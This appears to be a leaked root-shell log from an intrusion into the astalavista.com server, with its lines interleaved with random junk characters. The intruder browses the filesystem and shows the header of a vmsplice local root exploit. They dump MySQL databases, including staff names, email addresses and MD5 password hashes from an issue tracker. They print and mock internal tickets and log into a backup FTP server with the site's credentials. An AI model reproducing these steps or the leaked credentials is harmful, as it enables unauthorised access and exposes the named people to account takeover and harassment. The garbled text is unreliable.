& E0 N$ d( O, Osh-3.2# ls -la
1 u7 h* u/ G$ M: E' q7 Ytotal 141208
- W' V; Z% }4 E( R( K: u" E9 {' Fdrwx–x–x 10 com com 4096 Apr 28 12:40 .; k0 N3 b0 O- l+ P/ q
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..0 y3 A2 H& [8 V0 G! G }3 c+ x+ W
drwx—— 2 com com 4096 Jun 4 04:04 backups
$ X, z+ Q6 O( ^, t' W-rw-r–r– 1 root root 2419504 Sep 28 2007 backup.sql
% g @+ v8 o5 @1 Adrwxr-xr-x 2 com com 4096 May 12 15:20 backup_system
$ I+ A" v5 I- t$ w" j8 o-rw——- 1 com com 21880 Jun 2 08:07 .bash_history0 j5 a( h# ?$ m/ A% v% E7 ]
-rw-r–r– 1 com com 24 Sep 24 2007 .bash_logout
- y9 D" _$ Y6 J-rw-r–r– 1 com com 176 Sep 24 2007 .bash_profile
, F7 C+ G) j, }) O, z c7 t-rw-r–r– 1 com com 124 Sep 24 2007 .bashrc
' I6 a$ F" R8 Q# P2 S# Xdrwx–x–x 3 com com 4096 Jan 29 2008 domains
' ~( p) ~* N4 b) W5 E G! ]8 {-rw-r–r– 1 com com 16409 Jul 16 2008 FWUser.class.php.fixed* P; E7 l) K0 l8 ^( U4 w5 h" f
drwxrwx— 3 com mail 4096 Jan 6 19:24 imap
1 ~0 c" K' a4 ]8 u2 N; e-rw——- 1 com com 69 Nov 18 2008 .lesshst0 L8 j$ g; x3 I) N
drwx—— 2 com com 4096 Sep 24 2007 mail/ E; u9 i3 K8 i# v( i8 E
-rw——- 1 com com 13970 Mar 28 21:42 .mysql_history6 B7 ~% G4 b7 S6 K7 e0 L
drwxr-xr-x 2 com com 4096 Aug 20 2008 .ncftp
2 _% B6 j4 Y0 {% Rlrwxrwxrwx 1 com com 37 Sep 24 2007 public_html -> ./domains/astalavista.com/public_html
/ c6 d! K$ f3 R5 Z$ J-rw-r—– 1 com mail 34 Sep 24 2007 .shadow
% F" O$ n8 b) ^7 L9 Udrwx—— 2 com com 4096 Aug 26 2008 .ssh
; [9 Q4 b2 A5 m, Q-rwx—— 1 com com 8515 Feb 10 2008 t
8 [* \6 {! a. V- G' G r* X6 ^8 v-rw-rw-r– 1 com com 6265 Feb 11 2008 t.c- T# ]9 ~# ]: h/ s: P/ h
drwxrwxr-x 2 com com 4096 Jan 30 15:47 tmp
0 M0 @% [' C* p. t-rw-rw-r– 1 com com 617 May 20 2008 .toprc3 j9 S: L# n' p% I( H; F' o
-rw-rw-r– 1 com com 141851766 May 19 2008 version2-backup-20080519-0900.sql: t; b, m2 ^- @# h
-rw——- 1 com com 16629 Mar 28 21:46 .viminfo
$ A& m. B# W0 ]. ?4 U4 T-rw-rw-r– 1 com com 51 Aug 25 2008 .vimrc
& M/ R' o* u1 q3 Z, z" Z1 J0 {- k* r) b4 q7 X: P% t+ X: X! m
sh-3.2# head t.c. b% X" K! p1 w% j! j
/*( Q9 S, S. F. ?8 ]1 c3 ^) u3 \
* jessica_biel_naked_in_my_bed.c+ D% y" s2 o3 ~
*
, d9 X& A' s3 n/ o+ h4 `* Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.6 a; h& \1 u+ _2 g6 K. A! }* K3 h8 }
* Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.
# \$ L4 L4 U6 y* t+ r* Stejnak je to stare jak cyp a aj jakesyk rozbite.. k% v+ O4 V2 k0 j" {
*/ y. Q& p% A8 I% f* e% Y w$ k2 W; f
* Linux vmsplice Local Root Exploit
B! A6 \6 G2 L: d* By qaaz8 \4 c: N8 ^& s$ l/ m
*
( j" _# f9 w" X8 c8 n- P# N) b7 Z9 c
sh-3.2# cd /
0 M' ~; U. v. h" d2 T$ Qsh-3.2# ls -la z7 e6 h G; O
total 360
8 ~! U5 Z6 W% F! Q0 wdrwxr-xr-x 25 root root 4096 Jun 3 02:43 .
& K6 ?! t5 J* p2 \* W! m5 Adrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..( M. A8 w7 O* C2 Q
-rw——- 1 root root 10240 Jun 3 02:39 aquota.group4 G/ ~8 @# [% X/ Y+ {
-rw——- 1 root root 10240 Jun 3 02:39 aquota.user2 h2 t5 m. T- N
-rw-r—– 1 root root 819 Jul 17 2008 astalavista.us.db
- P, _8 `8 x( B# p-rw-r–r– 1 root root 0 Jun 3 02:43 .autofsck
# U/ Q' D& L$ P$ g-rw-r–r– 1 root root 0 Sep 16 2007 .autorelabel0 x' y% V, Z. d# G& C( l4 ?! X
drwxr-xr-x 3 root root 4096 Dec 29 2007 backup& |3 g2 K d7 M! M
drwxr-xr-x 2 root root 4096 Jun 4 04:03 bin
3 e+ v& A: ]1 a/ b5 m7 s) a& ^% F3 hdrwxr-xr-x 5 root root 4096 Jun 2 14:06 boot5 Z' j9 z/ }( |+ l/ d
drwxr-xr-x 11 root root 3620 Jun 3 02:43 dev6 u4 j4 V+ V) v
drwxr-xr-x 84 root root 12288 Jun 4 03:16 etc
5 I7 r. r( }+ N, i+ g. odrwxr-xr-x 14 root root 4096 Mar 11 17:56 home
/ j6 y- L% M' c; c7 ?! w* b-rw-r–r– 1 root root 13387 Mar 20 2008 httpd.conf' K, Y' k: s( n+ |
drwxr-xr-x 11 root root 4096 Jun 4 04:02 lib
! {4 G5 Q- @& E3 n$ [0 Gdrwxr-xr-x 7 root root 4096 Jun 4 04:03 lib64# `% p+ q5 z _* n% _- N( Y9 {
drwx—— 2 root root 16384 Sep 11 2007 lost+found; Z- ^, H/ i5 c7 e* F- T3 ~
drwxr-xr-x 2 root root 4096 Mar 11 17:56 media/ ?4 v- s7 y- }. v; J: b
drwxr-xr-x 2 root root 0 Jun 3 02:43 misc
) |5 C5 d/ Y' @drwxr-xr-x 2 root root 4096 Mar 11 17:56 mnt
; h( c8 V6 \/ ]3 W8 a+ v-rw-r–r– 1 root root 5859 Feb 3 2008 mrtg.cfg
/ h( [2 Q" K: J. D0 b2 t- U tdrwxr-xr-x 2 root root 0 Jun 3 02:43 net8 B! r, S7 Z9 ^: t
drwxr-xr-x 3 root root 4096 Mar 11 17:56 opt$ ]" R5 s( d- n {9 k' `; ?, D
dr-xr-xr-x 264 root root 0 Jun 3 02:42 proc E& _/ }1 f6 ?0 ]- T3 _
drwxr-x— 15 root root 4096 Jun 4 08:40 root
9 X) H3 \; e: Q Odrwxr-xr-x 2 root root 12288 Jun 4 04:03 sbin+ g" ~4 j& C4 y U B$ s
drwxr-xr-x 2 root root 4096 Mar 11 17:56 selinux7 x" x/ U8 L7 |/ e. z; E5 u) j
drwxr-xr-x 2 root root 4096 Mar 11 17:56 srv
( m/ \; H! [. x% r idrwxr-xr-x 11 root root 0 Jun 3 02:42 sys. q% Q, y" ^$ l2 Z1 V
drwxrwxrwt 4 root root 122880 Jun 4 10:35 tmp
- a# f2 _5 J4 U+ Ndrwxr-xr-x 16 root root 4096 Jun 2 13:56 usr$ X5 f& C5 M: G. c! j5 V
drwxr-xr-x 26 root root 4096 Jun 4 03:16 var
9 I0 a9 p. ~' ^. ~ k) Y1 v/ ~3 t# t4 J L# N+ c& n
sh-3.2# cd opt, Y5 d9 V0 B$ s4 e/ I0 t
sh-3.2# ls -la
9 m2 i; Z2 m! |( P* W$ Dtotal 20- r( \+ v' s4 V( y
drwxr-xr-x 3 root root 4096 Mar 11 17:56 .
' A: [! `, W6 ]4 e* O: Rdrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
: P% }. |3 m8 g0 g. W/ M& E+ Ndrwxr-xr-x 15 root root 4096 Mar 20 2008 lsws" m4 \( z# R! v$ Z9 n' a; I
% s/ r: l% h2 D! M5 @7 b0 Ysh-3.2# cd lsws/
0 d+ ?, N8 c5 m* x. J1 n. ash-3.2# ls -la
1 B: I! m* ~) l. N: \) s# Gtotal 108
. \9 L4 P/ G i; p) @3 ?2 Qdrwxr-xr-x 15 root root 4096 Mar 20 2008 .
. p- |8 ?5 E8 x* ^& tdrwxr-xr-x 3 root root 4096 Mar 11 17:56 ..% I8 m7 `7 g. }0 @2 H( Q% ^
drwxr-xr-x 8 root root 4096 Mar 20 2008 add-ons% Q& u% n; t: ~' J+ R
drwxr-xr-x 13 root root 4096 May 29 15:10 admin
' D# I" I& ^& @( Sdrwxr-xr-x 5 apache apache 4096 May 29 15:10 autoupdate
; b% G6 b1 S; }, p) k2 h% fdrwxr-xr-x 2 root root 4096 May 29 15:10 bin
) }) w9 k5 z. }1 R1 r: rdrwx—— 4 apache apache 4096 Jun 3 02:43 conf! |- ]& Z7 S, c2 C9 d5 ~9 t
drwxr-xr-x 7 apache apache 4096 Mar 20 2008 DEFAULT5 w8 z, }4 J: U8 L- F
drwxr-xr-x 2 root root 4096 Sep 15 2008 docs
" {0 n) Y7 g# Ddrwxr-xr-x 2 root root 4096 May 29 15:10 fcgi-bin
3 f' k6 z0 F- ^+ S V M9 Sdrwxr-xr-x 2 root root 4096 Sep 15 2008 lib8 f) t- u- R; _) b1 c
-rw-r–r– 1 root root 6959 May 29 15:10 LICENSE/ S+ w' X3 R1 X* w! n1 O6 L
-rw-r–r– 1 root root 2214 May 29 15:10 LICENSE.OpenLDAP
' z1 M$ i1 _9 C-rw-r–r– 1 root root 6279 May 29 15:10 LICENSE.OpenSSL+ n' l: [" V' ] o! d
-rw-r–r– 1 root root 3208 May 29 15:10 LICENSE.PHP
6 p. O, |7 s$ K, n e( gdrwxr-xr-x 2 root root 20480 Jun 4 09:55 logs" [3 Y5 U6 ^( r& A7 j
drwxr-xr-x 2 root root 4096 Mar 20 2008 php9 q3 a) Y: t+ E! Z# d7 |( e
drwx—— 2 apache apache 4096 Mar 20 2008 phpbuild' f# `" j8 E& \
drwxr-xr-x 3 root root 4096 Mar 20 2008 share/ |: o2 d, |! c& p* L1 c
-rw-r–r– 1 root root 6 May 29 15:10 VERSION! y* E' T8 s( P9 l# }
) I" [7 x3 \ Ssh-3.2# cd conf
: ~7 f/ c, M) _4 Y4 h; h; `9 j8 fsh-3.2# ls -la
2 C# u; |% K+ P$ z! N3 M% W( Wtotal 48
( ~# b/ i# O" h8 D4 W X }! f/ y; Xdrwx—— 4 apache apache 4096 Jun 3 02:43 .) D( X }" W5 y% u) v+ `7 e
drwxr-xr-x 15 root root 4096 Mar 20 2008 ..
9 G1 d& s, x: D; h1 H7 ?9 Ydrwx—— 2 apache apache 4096 Mar 20 2008 cert2 Z& ?6 E6 [# N: K3 g
-rw-r–r– 1 apache apache 6668 May 29 15:13 httpd_config.xml) I! u0 g6 u, J* I
-rw——- 1 apache apache 6613 May 27 18:33 httpd_config.xml.bak3 s4 V5 \( I* ~6 i
-rw-r–r– 1 root apache 0 Jun 3 14:11 .last d* [1 b. r, M- O; |- N1 ?
-rw——- 1 apache apache 256 May 29 15:10 license.key. h) a6 z/ h; [4 ] ^4 U% t
-rw——- 1 apache apache 256 Mar 21 2008 license.key.old
6 I" Y" f U- t% i8 v-rw——- 1 apache apache 3320 Mar 20 2008 mime.properties
* w& F% i! x7 r+ }( g; F# Y) J0 l-rw——- 1 apache apache 20 May 29 15:10 serial.no
1 e" z$ b2 l2 O7 X$ @1 W2 K: a6 Pdrwx—— 2 apache apache 4096 Mar 20 2008 templates
" Z, B+ z% G `' \+ [7 k' C4 E( V
' m1 A9 |9 Q! W ?sh-3.2# cat serial.no. s8 H p" Y% w2 R3 `+ q/ z
IbDl-oVsO-CKqL-wVRa
6 x9 e- Q' R1 v! P! ^+ _$ a' F! M2 E5 g* Z- {& j9 ^
sh-3.2# mysql0 Z4 s$ s% @" o6 ^
Welcome to the MySQL monitor. Commands end with ; or \g.
/ A) M& r7 l3 y8 v1 i5 b/ jYour MySQL connection id is 286844
9 y" a( s1 ^; ?. [$ Z# UServer version: 5.0.45-community-log MySQL Community Edition (GPL) Q3 f8 \0 E/ X* ]
" p, y# k6 g" FType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
, M# w$ n4 i: p7 l. j
* o4 q3 F7 s% y: ]+ C) g4 t+ \ cmysql> show databases;+ {- ~6 u! R: i) j
+———————–+& p9 t# c m ]" E* E* ?' [
| Database |7 l1 `% x+ Y( Q ?" l! m
+———————–+9 N/ P+ y! M- ?- y
| information_schema |+ ~7 D' q4 e1 W8 y8 d
| astanet_ads |
: p0 N" w4 [. p% d; w| astanet_mailing_lists |
Q0 Z0 m* w u| astanet_mediawiki |
% W0 |5 a6 ]9 q' Y& p2 M& w" o3 v0 M| astanet_membersystem |0 N& Z+ n- e: [" W1 _5 w( s
| com_contrexx |9 b: L6 E6 f. [" w" S' k
| com_contrexx2 |6 x+ u! w8 d6 X; g# m
| com_contrexx2_live |' D6 W& C. A3 {2 b9 b- N
| da_roundcube |( p k9 c4 ~. `. G6 V* i; q
| dolphin |
& S W& ], R' e| ideapool |
* [6 J# i4 n8 t A| mysql |
Q) n( Y( u* }! r( i. w4 D| test |
' v1 L- O: K5 |* v6 A6 U| yourmaster |9 i% x/ T, e5 F% p9 T
+———————–+* l: p9 C5 w4 Y5 @8 i" e
14 rows in set (0.00 sec)5 x3 `8 w- h# u; y; c- N
& {' e: G+ H- s0 `* o" f
mysql> use ideapool
. T+ b' N0 [5 s# F2 a& FDatabase changed
8 e! o. R6 K) b) S+ [& K, r; m0 V2 Qmysql> show tables;
* N9 f! e" N+ g' G9 b2 H+———————————–+; N( `* B4 |2 v" ]: y
| Tables_in_ideapool |% ?5 y, A. Q6 k W z$ l
+———————————–+
q% L( L) I* }6 n| eventum_columns_to_display |
5 b S$ P9 k: r8 J b7 }0 C8 u3 A| eventum_custom_field |/ \1 `8 X) j+ d
| eventum_custom_field_option |
- c. O) {0 P! _! u" C' P| eventum_custom_filter |
B) K$ g6 a5 @* H) a/ k4 W' n| eventum_customer_account_manager |
2 l: w1 Q" K0 c* q% e9 h7 k# J| eventum_customer_note |
' Y6 b/ W1 w& {/ H% I, t& }0 I| eventum_email_account | ~! e& N7 \1 O# r
| eventum_email_draft |
$ Y$ P" @+ K# |6 Y/ k2 n5 {% y| eventum_email_draft_recipient | h: U6 G6 o9 D1 O. k/ T
| eventum_email_response |6 y' o# W6 N) s8 Z2 q4 K( M
| eventum_faq |
+ U9 M% j" t$ b| eventum_faq_support_level |
% u7 a& i8 M" G: V/ d6 \| eventum_group |. ?* B2 s& |! M1 B7 u
| eventum_history_type |
# s* l4 |8 C" {; S* s4 z9 C| eventum_irc_notice |. x- B9 m- m7 c3 t& u6 @' c
| eventum_issue |9 ?% G5 K0 `- J) ]
| eventum_issue_association |/ H/ e# } o+ t
| eventum_issue_attachment | e2 K/ y% t5 c! m
| eventum_issue_attachment_file |
1 Z/ u0 k8 N0 N8 u8 q7 F| eventum_issue_checkin | I0 {2 d, G0 B8 A3 E1 T" u
| eventum_issue_custom_field |
0 T5 k2 y+ A7 E) M| eventum_issue_history |
2 K7 m- F! f0 w9 T| eventum_issue_quarantine |( F# A) M1 [" {
| eventum_issue_requirement |
% u1 I2 J9 @; g2 D$ B' S0 K: e| eventum_issue_user |; U! J* w5 q! A
| eventum_issue_user_replier |
+ J8 \( l9 B& W| eventum_link_filter |+ l. q: u) z& E
| eventum_mail_queue |
3 {9 t$ G( v1 T0 V" j( ^; M| eventum_mail_queue_log |9 L. F, h3 s, i9 r. k
| eventum_news |
/ Y$ j/ Y& i( L/ M" x3 Z3 d9 i; ]6 h| eventum_note |
: D2 S3 U+ d6 a l# l9 ]8 }7 N| eventum_phone_support |8 z9 _* n. ~# j( g7 i3 q
| eventum_project |7 ]- V T$ b7 P. L% O: P: ~
| eventum_project_category |
) `. {7 F8 \3 e+ G5 N9 G' l( J| eventum_project_custom_field |
/ g2 N+ K) t0 ^# i* [% C/ [| eventum_project_email_response |
' a% N+ v% P2 y1 a M. v6 T, D| eventum_project_field_display |
/ k& o4 G# c% b, V( s+ s| eventum_project_group |
! r: N7 ~7 c' @6 @. C$ C! N' e| eventum_project_link_filter |
: y' \; V4 j# J: {9 t| eventum_project_news |' V6 ~+ T8 G$ j6 Q# z% j) T+ T( v
| eventum_project_phone_category |
% [! [: p* J. Y& C+ r/ L0 q3 d+ Y" w0 U| eventum_project_priority |" V' t |: t7 q5 `# p# W" [, y
| eventum_project_release |. W' x% I/ ?& [1 R$ C0 W
| eventum_project_round_robin |
4 h3 M" x* B9 Y2 z7 X| eventum_project_status |+ p! j* | G# M1 J5 a
| eventum_project_status_date |9 j8 l, L: R" u# C3 y8 r# H, c, _+ U: S
| eventum_project_user |+ G) {4 B7 ]" t; ^1 b3 T
| eventum_reminder_action |
! H* a q% \7 f u- T+ e| eventum_reminder_action_list |6 _* u! ~! M- i$ F9 R" b, k
| eventum_reminder_action_type |, q2 Q; o2 K0 d9 Y+ T& a, v- P
| eventum_reminder_field |1 k* a( x' |/ f5 H, O
| eventum_reminder_history |
6 Y! `+ A$ Z3 f3 k* ^4 \| eventum_reminder_level |: ]; J B6 v) l! ?
| eventum_reminder_level_condition |
7 e$ q* |8 m8 J6 E2 s* y| eventum_reminder_operator |1 P) P' k, i5 B4 w2 R4 b
| eventum_reminder_priority |
% Y9 q; P3 W" d: \; X- v| eventum_reminder_requirement |
) N e3 c& @! S. [; o| eventum_reminder_triggered_action |
& C: E( p6 x/ Z| eventum_resolution |
1 s9 ^+ C; c+ G1 x| eventum_round_robin_user |3 Z: ~0 q2 B# O6 j3 k% z& J
| eventum_search_profile |
2 U* _0 d# v/ ^0 }| eventum_status |
3 S$ Z) J2 C+ d5 A/ q| eventum_subscription |: ?) C8 i" e/ _3 q0 B
| eventum_subscription_type |) @' |# Q5 X' T8 v% _
| eventum_support_email |
3 J* f. L- G% L3 u" d& g| eventum_support_email_body |3 O+ K4 c K' t: K3 o0 B
| eventum_time_tracking |
7 V) q I- r) _| eventum_time_tracking_category |
: K+ e U- o# y' _& t| eventum_user |& y7 H9 V {) g$ f; X
+———————————–+
) @% b1 a _& P7 B69 rows in set (0.00 sec)
! \6 \6 k8 C$ _; u# L
: Q, \9 E+ q6 Ymysql> describe eventum_user;
+ D R4 r* {9 ?+ q$ c+————————-+——————+——+—–+———————+—————-+! ?9 {5 }: U# L5 c; k# t
| Field | Type | Null | Key | Default | Extra |. H! E: \ o' ?- r: S& Z+ F
+————————-+——————+——+—–+———————+—————-+
`' K9 A+ M F# n1 Y, M| usr_id | int(11) unsigned | NO | PRI | NULL | auto_increment |1 s( C+ m& f- k8 b; |
| usr_grp_id | int(11) unsigned | YES | MUL | NULL | |# l6 s7 S7 _0 }
| usr_customer_id | int(11) unsigned | YES | | NULL | |
5 |; Y1 t7 D F0 m" D| usr_customer_contact_id | int(11) unsigned | YES | | NULL | |" B4 k# @# s$ f4 h# G7 R
| usr_created_date | datetime | NO | | 0000-00-00 00:00:00 | |
2 H+ H C: X# n0 M| usr_status | varchar(8) | NO | | active | |
9 g4 z9 t, E# |2 O4 o8 V| usr_password | varchar(32) | NO | | | |
! J& d" s5 p/ R2 P, `5 \! }2 I9 H| usr_full_name | varchar(255) | NO | | | |
/ n6 v" g: `- {. O| usr_email | varchar(255) | NO | UNI | | |
7 k* Q5 M8 ?0 f& _! {) S| usr_preferences | longtext | YES | | NULL | |
5 h3 B2 x7 T5 p3 A+ ]8 x| usr_sms_email | varchar(255) | YES | | NULL | |. ]3 u, J) Q$ L3 H3 N/ z- U7 n% {7 B
| usr_clocked_in | tinyint(1) | YES | | 0 | |
' r; }; f8 O+ y, e" N4 [* n, a/ }| usr_lang | varchar(5) | YES | | NULL | |
! ^- d+ p# q9 G$ y+————————-+——————+——+—–+———————+—————-+; ]7 p7 ~: R% Y# V3 l8 l
13 rows in set (0.00 sec)
6 Y( \2 L8 t! O1 O# P. ?3 U3 O! Q+ V& s. H/ y, |) ]
mysql> select usr_full_name,usr_email,usr_password from eventum_user;
! d) t: S9 C4 f; r W+———————-+——————————-+———————————-+
( |* O( ?) c& K5 H Z| usr_full_name | usr_email | usr_password |3 }7 w& B8 m0 M7 d4 k5 [
+———————-+——————————-+———————————-+" J7 l+ P, J' W' c- O) W
| system | 链接标记system-account@example.com | 14589714398751513457adf349173434 |- X, E1 l9 S9 E% U+ n
| Developer (Paulo) | 链接标记paulo.santos@astalavista.ch | 26a35a1cf8895c27fb37ef4cf149f7bb |! E3 `) H; \4 h# [9 u' l
| Be1er0ph0r | 链接标记be1er0ph0r@gmx.de | 229766dc0ca1fb67160a8782321dfdce |
' d! K2 n b3 L8 P7 g| Admin | 链接标记pascal.mittner@astalavista.ch | 57c2877c1d84c4b49f3289657deca65c |
% W! t/ f9 {! G s$ {| ADMIN | 链接标记admin@astalavista.ch | f6fdffe48c908deb0f4c3bd36c032e72 |
% }% F6 |5 K7 t( K$ D| USER | 链接标记user@astalavista.ch | 5cc32e366c87c4cb49e4309b75f57d64 |
1 ~/ O2 ~. {; w: K| Glafkos - (nowayout) | 链接标记glafkos@astalavista.com | f7735ab119023a8abb2301e67f81cd67 |
9 i' U( \8 D/ c9 l| Joao | 链接标记joao.pontes@astalavista.net | f805c071d7c823b937448c54c047b9fd |
* K4 a! D& r6 \1 z& T( S; c; t| Pascal | 链接标记pm@astalavista.ch | e10adc3949ba59abbe56e057f20f883e |
7 ]$ K5 I6 @! U: @| commander | 链接标记commander@astalavista.com | 932cd250918f881d41feb0b93883a926 |
9 b7 G4 ]# ^4 W4 x| ishtus | 链接标记ishtus@astalavista.com | a587ffc88b3dbbba3fd2fe67af649ff0 |5 V) L9 ?8 ?7 v* x
| sykadul | 链接标记sykadul@astalavista.com | 20224a2f3eeb57a13a10b4df543c128e |2 L* _2 @# Z0 R, f. V u; D H! Y6 [
| Zach McElroy | 链接标记admin@badfoo.net | 33c5d4954da881814420f3ba39772644 |
0 Q" Z& V% c# ^( @' ?| usb | 链接标记usbenigma@hushmail.com | b513f22c3db6932855ad732f5f8a10a2 |
$ ]& G) i; G! b. j| cyph3r | 链接标记cyph3r@astalavista.com | 6e1e50017a945e874d52ec91f9ab2cee |
! ~9 J) n8 K! W5 r" i* ?+———————-+——————————-+———————————-+0 b3 @: i8 O' k& \: E3 P
15 rows in set (0.00 sec)3 d T2 @" V* e
`* b2 c% S+ j$ h
mysql> select iss_description from eventum_issue where iss_id = 43;
1 v$ b- S6 p. \$ {5 c! s+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
! ]! b; O- G* m| iss_description
8 I8 R$ j3 c( u& U) d, ||
" ~: I: m: ~: X+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+1 X, A9 Q9 a2 B; \. o' C
| Ok guys, to boost our traffic and revenue what we have to do is keep users logged in… how to do that? well think about it… if a user is watching a movie… he’ll be q- }" R/ F3 t( ]
connected for 90 mins… 120mins… so what i propose is something like: N- q l/ E( I( w% B
链接标记[url]http://www.surfthechannel.com/[/url], p+ h" Z, D6 B2 \7 K
since they only provide LINKS to the movies they are LEGAL and don’t break DMCA rules… so we could do the same… “iframe” the content on our website or use a system
7 e) r4 p$ {" i- i1 nlike podcast that uses our own flash player to stream content from other places, therefore the content NOT BEING HOSTED ON OUR SERVERS but only viewed… which doesn’t
s# h2 ~+ e) f& F2 C/ wbreak any laws as far as i am aware (we should research on that just to be sure though!) Of course we would have to provide users with the button to take the content off$ h5 I S- P& |0 `, P1 U
if they think it breaks copyright laws and we will remove it… i think that makes it on the border of DMCA…8 I: x+ V; V6 @, v2 E
1 q! k7 ~1 {7 S1 }7 PWe could also put advertisement during play on the flash video player itself… extra $$…$ V1 [/ s. K1 U# q; y+ ~
4 b: n- d9 C5 M2 F' aBy sykadul |8 O) V7 J9 N8 d6 y. E& r r
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+- ?& q0 @8 p& m* `: C! |+ Q
1 row in set (0.00 sec)
- P2 q. C' N: e9 p' ^# o& r& [- W% l+ T1 z' Y" y2 J8 _
// Money and extra $$ is all they care about. remember that.
* R: m: R; d( ~' b5 }4 ~4 D6 T8 s- A8 p
mysql> select iss_summary,iss_description from eventum_issue where iss_id =42;; o. E3 h! W6 ^1 g
+————————+——————————————————————————————————————————————————————————————————————————————-+* z- K8 ^0 Y% b2 O) T: W
| iss_summary | iss_description % N- |0 f' F ?" d
|. u8 H( m8 ~, t+ Q" E3 Q+ K; p* s
+————————+——————————————————————————————————————————————————————————————————————————————-+% o0 H$ O& F1 K5 o1 S
| Forum for REAL EXPERTS | Hello,$ E/ n+ ~; B$ c3 i% ?! D
; W* o, y1 I# ^/ \
Ishtus and I,
5 U1 V d# J; E$ D/ e) J
; E6 l, ^: @; TCame up with a crazy and very workable and professional idea. We create an invitation only forum with the BEST security experts worldwide
- S* O8 Z7 c3 A9 Z6 l4 sONLY. Security Experts from Bugtraq lists, exploit writters, reverse engineers etc..1 z2 y; V* V/ z) {4 v3 {
1 R/ r, z3 D: n1 {, ?- k
One example a friend of mine from coresecurity.com!
/ p; H9 ~ k& ~+ I1 X
* `0 \4 J* i- Z$ j5 gWe could have big projects etc.. and we can work all together to bring to the security community exploits, open source software etc..
7 [4 K; K# N! g( \0 a7 ~! e( L1 z3 g) g6 [( Z) Y7 t! O9 i" O- y q
|
6 \* Q3 ? S2 G' \8 {7 Q+————————+——————————————————————————————————————————————————————————————————————————————+
K$ y4 L. w* w# w$ `1 row in set (0.00 sec)
3 x2 [8 t8 {# R
. B8 \) @; t) W3 ^7 H// What an awesome yet original idea Ishtus and him… bring MORE security “experts”, thats exactly what the world needs…/ j& J0 r* `' ?3 P' r
- a* Q$ G. z3 i
mysql> select iss_summary,iss_description from eventum_issue where iss_id = 16;' V4 x: n# S% s y* `2 z
+——————+———————————————————————————————+
# ^$ S7 ?/ p8 h. O" h9 N5 v% m| iss_summary | iss_description |* V- }) m* h5 \0 k4 a) d8 I; k1 u$ R
+——————+———————————————————————————————+
& P) m; u* f, Q! K| Website guidance | Virtual Girl which guides you trought the website.0 N% ]# M: p$ P. ?
' Q9 L6 L; L8 z
We need a girl with who you can ( talk )!!!' I% i3 L' P w1 h9 `+ L' ^$ a
Also for the News!0 x" i6 U% n7 @" ?5 Q- ?. F6 ~
So my suggestion is a girl who read you the news loud if you like!
" f: _. \9 \/ F' p; b3 yyou can choose between read yourselfe or she read it for you or both! v1 H6 ~. j2 t. [5 @
9 G9 o2 o1 D ^! r5 e+ {) _
Go to 链接标记[url]www.heise.de[/url]! There is an example for Voice News! It’s a good thing!!!
1 c4 e1 j' H1 S; \: P# v* |
7 J8 H+ b6 l7 s2 \ YHave a look on the example girls!!! D6 [ N* E% C# G
0 Q9 H% K" }: j# F% Z, z# g
链接标记[url]http://www.yaoti.com/de/free_yaoti.html[/url]$ G9 N9 J$ [4 m. K; r% `' T
( L8 ^" v4 W6 x2 L. D) L, ~
or that4 J1 B4 V# u4 |. O2 @* y( K
1 [: p/ l0 `. x: z* h) N2 V7 x
链接标记[url]http://www.yellostrom.de/[/url]. R1 x4 a0 {) `
4 n# S! c3 x( T4 y1 |; Y: _: u- v
|
+ c! \( U/ H* K- y8 j: l2 `+——————+———————————————————————————————+8 C' h8 W& o7 J1 C7 e8 \
1 row in set (0.00 sec)
4 [2 _0 B' h) c# _. {
0 p' z9 }9 w5 n! j+ B" i' ^// ha ha.* I' C* }9 P7 v4 p0 ] {
) ?5 K+ k, Q6 A$ M2 p
mysql> select iss_summary,iss_description from eventum_issue where iss_id = 7;
0 }; u7 T. R7 D. \" f) y7 w4 n/ @, P+————————–+———————————————————————————————————–+, Y- X/ u2 n' v( ~2 f9 v
| iss_summary | iss_description | r2 H |" p+ r I, j6 q4 ~3 \: H
+————————–+———————————————————————————————————–+
6 }( A4 a1 P# Z| Exploit Development Team | We need an exploit development team to focus on exploit research and publication under Astalavista name. |' q: M, y7 M2 P( B* s
+————————–+———————————————————————————————————–+! r8 M, h1 r0 W1 `0 _) d) D0 w
1 row in set (0.00 sec)/ ]3 G. t- n' ^/ ~# l* S- U; a
3 O2 V% a7 j8 N! S// LOL.9 g. x# H, u' _! S/ t5 y* P' i
4 P1 u- X' l* O, m
mysql> exit( [& j& d' j% \% j& o' U
Bye
/ L% f3 E2 T' |6 u7 H
}; y# R- Q# _7 V \sh-3.2# ftp 212.254.194.163
* M5 K2 a; _# h# e" Z' u& v& NConnected to 212.254.194.163.9 P" U s) [4 n9 P+ c J
220 BackupCOM_VW FTP server ready.7 ~0 w8 q6 k% f1 h4 P5 h$ \
504 AUTH: security mechanism ‘GSSAPI’ not supported.
( d4 F c& w! B$ x504 AUTH: security mechanism ‘KERBEROS_V4′ not supported.) w! A4 _) W: k+ N2 J9 y) ]. Q% T
KERBEROS_V4 rejected as an authentication type, X* Q3 x8 _, L! G( J
Name (212.254.194.163:root): astalavista.com
4 R7 ~1 x4 n0 m, g: H331 Password required for astalavista.com.; L& @1 K$ p3 |3 _6 m5 ~
Password:( o2 c3 v; N2 D6 W1 m6 ^( i7 Y+ v
230 User astalavista.com logged in.; u/ { h4 H& c; T) \+ E+ f
Remote system type is UNIX.
4 ]1 v5 v3 k/ H+ S G* S3 IUsing binary mode to transfer files.
N* n' f7 I* n/ J9 ~, Jftp> ls -la$ D* ^# Y9 I B
227 Entering Passive Mode (212,254,194,163,2,188)
& t% X7 _3 i; `150 Opening BINARY mode data connection for ‘file list’.
& t7 F( E" j/ |9 r& L( k7 _& v& Cdr-x—— 1 root users 4096 Jun 4 06:13 astalavista.com- D6 C) G- i* R6 ^' d' h$ Z) |
226 Transfer complete.
( I0 S( U+ E& N8 W& aftp> cd astalavista.com
% N& _* n3 M$ T; R250 CWD command successful.. x2 e% G5 { g s- K. W& W
ftp> ls -la! i7 X6 T2 y* X/ D9 M9 T
